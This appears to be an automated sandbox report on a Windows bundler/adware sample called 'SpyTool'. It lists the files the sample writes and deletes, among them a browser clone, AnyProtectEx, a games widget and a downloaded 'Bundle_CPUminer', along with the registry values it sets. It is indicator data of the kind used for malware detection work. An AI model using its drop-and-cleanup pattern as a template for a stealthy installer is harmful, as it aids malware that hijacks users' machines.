%Program Files%\MyBrowser\MyBrowser\Application\master_preferences (814 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\hu.pak (235 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\libegl.dll (204 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\ml.pak (1826 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\39.5.2171.95\Installer\setup.exe (6841 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\VisualElements\logo.png (5 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\libglesv2.dll (5442 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\secondarytile.png (3 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\nb.pak (206 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\chrome_child.dll (261193 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\VisualElements\smalllogo.png (9 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\gu.pak (1705 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\en-GB.pak (189 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\mr.pak (1708 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\ko.pak (228 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\sk.pak (229 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\pdf.dll (67091 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\39.5.2171.95.manifest (222 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\sr.pak (1610 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\delegate_execute.exe (12288 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\kn.pak (1768 bytes)
%Documents and Settings%\All Users\Desktop\MyBrowser.lnk (1 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\te.pak (1761 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\fil.pak (228 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\ro.pak (228 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\chrome_200_percent.pak (7972 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\39.5.2171.95\Locales\sl.pak (211 bytes)
The SpyTool deletes the following file(s):
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin (0 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\wow_helper.exe (0 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp (0 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606 (0 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source828_25606\Chrome-bin\mybrowser.exe (0 bytes)
%Program Files%\MyBrowser\MyBrowser (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5517\prefs (0 bytes)
The process nsp45.tmp:596 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsg49.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf48.tmp (19514 bytes)
%Program Files%\AnyProtectEx\product.guid (40 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg49.tmp\flush-inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg49.tmp\WmiInspector.dll (3616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg49.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg49.tmp\inetc.dll (784 bytes)
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsg49.tmp (0 bytes)
%Documents and Settings%\%current user%\Application Data\AnyProtectEx\installer\tempfile.t (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf47.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl4A.tmp (0 bytes)
The process wmic.exe:1336 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
The process nsr21.tmp:908 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nss25.tmp\checks.txt (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss24.tmp (5929 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\49OZBWQM\thankyou[1].php (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss25.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss25.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss25.tmp\md5dll.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss25.tmp\registry.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss25.tmp\amisid.exe (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss25.tmp\nsisos.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss25.tmp\post_reply.htm (14 bytes)
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nss25.tmp\checks.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss25.tmp\post_reply.htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss25.tmp\inetc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss25.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss25.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss25.tmp\md5dll.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss25.tmp\registry.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc23.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss25.tmp\amisid.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss25.tmp\dummy.htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss25.tmp\nsisos.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SU1CM1PJ\thankyou[1].php (0 bytes)
The process nsr18.tmp:1388 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsc1C.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc1C.tmp\registry.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc1C.tmp\checks.txt (544 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm1B.tmp (8776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc1C.tmp\amisid.exe (1856 bytes)
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsm1A.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc1C.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc1C.tmp\registry.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc1C.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc1C.tmp\checks.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc1C.tmp\amisid.exe (0 bytes)
The process nsr18.tmp:460 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsi1F.tmp\post_reply.htm (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi1F.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi1F.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi1F.tmp\md5dll.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi1F.tmp\registry.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi1F.tmp\nsisos.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi1F.tmp\checks.txt (544 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SU1CM1PJ\thankyou[1].php (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss1E.tmp (8776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi1F.tmp\amisid.exe (1856 bytes)
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsi1F.tmp\post_reply.htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss1D.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi1F.tmp\nsisos.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi1F.tmp\inetc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi1F.tmp\md5dll.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi1F.tmp\registry.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi1F.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi1F.tmp\checks.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi1F.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi1F.tmp\dummy.htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi1F.tmp\amisid.exe (0 bytes)
The process nsx27.tmp:1340 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-6JM0V.tmp\nsx27.tmp (3781 bytes)
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-6JM0V.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-6JM0V.tmp\nsx27.tmp (0 bytes)
The process nsx27.tmp:336 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\All Users\Start Menu\Programs\GAMESDESKTOP\GamesDesktop.lnk (812 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\upgmsd_re_005010096.7z (7433 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\encrypt.exe (4185 bytes)
%Program Files%\gmsd_re_005010096\predm.exe (2321 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\is-42CRH.tmp (7433 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\is-QF5NP.tmp (15278 bytes)
%Program Files%\gmsd_re_005010096\gmsd_re_005010096.exe (29430 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\_isetup\_shfoldr.dll (23 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\gamesdesktop_widget.7z (15278 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\is-UJDHN.tmp (4185 bytes)
%Program Files%\gmsd_re_005010096\unins000.msg (375 bytes)
%Program Files%\gmsd_re_005010096\gamesdesktop_widget.exe (77005 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\gmsd_re_005010096.7z (8657 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\itdownload.dll (1281 bytes)
%Program Files%\gmsd_re_005010096\is-QNSOT.tmp (22284 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\predm.7z (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\ex.bat (1564 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp (4 bytes)
%Program Files%\gmsd_re_005010096\unins000.dat (29605 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\gmsd_re_005010096\upgmsd_re_005010096.exe (23062 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\is-TA4AV.tmp (8657 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\CheckProc.cmd (288 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\is-KNG9H.tmp (2105 bytes)
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\gamesdesktop_widget.7z (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\av.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\upgmsd_re_005010096.7z (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\encrypt.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\predm.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\_isetup\_shfoldr.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\upgmsd_re_005010096.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\gmsd_re_005010096.7z (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\itdownload.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\_isetup (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\predm.7z (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\ex.bat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\CheckProc.cmd (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\gamesdesktop_widget.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\gmsd_re_005010096.exe (0 bytes)
The process encrypt.exe:1700 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\upgmsd_re_005010096.exe (24230 bytes)
The process encrypt.exe:1364 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\predm.exe (1447 bytes)
The process encrypt.exe:1564 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\gmsd_re_005010096.exe (31996 bytes)
The process encrypt.exe:496 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-2GQG0.tmp\gamesdesktop_widget.exe (92311 bytes)
The process %original file name%.exe:860 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsr20.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nssE.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst4.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh11.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\49OZBWQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso13.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf7.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\49OZBWQM\7121923af824073a25b2b7e6ba0a6e0e[1].exe (6984 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd41.tmp (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa28.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf46.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SU1CM1PJ\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss26.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy34.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp45.tmp (38832 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LLHPASG1\CESwN2Es[1].exe (11704 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg10.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M5WEVZKN\setup[1].exe (128293 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M5WEVZKN\VuuPC_VO2_8907[1].exe (14960 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm22.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu3B.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss40.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp5.tmp (869 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LLHPASG1\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb2D.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\49OZBWQM\Bundle_CPUminer[1].exe (7288 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu14.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr21.tmp (7288 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SU1CM1PJ\setup_gmsd_re[1].exe (365499 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M5WEVZKN\Validate[1].exe (4152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy42.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsqA.tmp (11704 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq9.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg4B.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M5WEVZKN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LLHPASG1\AnyProtectSetup[1].exe (38832 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb2E.tmp (13784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nssF.tmp (128293 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm3D.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz36.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SU1CM1PJ\ibf-cmi-1938953175.us-east-1.elb.amazonaws[2].htm (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk3C.tmp (14960 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk6.tmp (3656 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SU1CM1PJ\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (90 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj35.tmp (5952 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\49OZBWQM\ibf-cmi-1938953175.us-east-1.elb.amazonaws[2].htm (30 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M5WEVZKN\vos[1].htm (869 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M5WEVZKN\smt[1].exe (13784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M5WEVZKN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (120 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2F.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\49OZBWQM\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SU1CM1PJ\cmmdWriter[1].exe (3656 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsmB.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk15.tmp (6984 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LLHPASG1\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (30 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg16.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk44.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi2.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\49OZBWQM\policyname[1].exe (5952 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx27.tmp (365499 bytes)
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsr20.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nssE.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh11.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso13.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsmB.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf46.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss26.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsqA.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg10.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SU1CM1PJ\ibf-cmi-1938953175.us-east-1.elb.amazonaws[2].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm22.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu3B.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp5.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss40.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi12.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu14.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb2D.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg4B.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr21.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd41.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy42.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq9.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy34.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nssF.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm3D.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz36.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa28.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk6.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SU1CM1PJ\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj35.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\49OZBWQM\ibf-cmi-1938953175.us-east-1.elb.amazonaws[2].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M5WEVZKN\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2F.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\49OZBWQM\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf7.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk15.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\LLHPASG1\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg16.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk44.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi2.tmp\inetc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx27.tmp (0 bytes)
The process nsd41.tmp:816 makes changes in the file system.
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nse43.tmp (0 bytes)
The process nsk6.tmp:496 makes changes in the file system.
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsq8.tmp (0 bytes)
The process nsqA.tmp:508 makes changes in the file system.
The SpyTool creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsrD.tmp (7695 bytes)
The SpyTool deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nscC.tmp (0 bytes)
Registry activity
The process upgmsd_re_005010096.exe:1928 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 20 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\Tutorials\updatetutorialeshp]
"Version" = "gmsd_re_005010096"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Tutorials]
"HostGUID" = "BCAF20B8-5919-4396-B056-12146139373A"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D3 5E 27 6F EF D3 7C C8 B2 D2 1E 06 06 27 C0 E4"
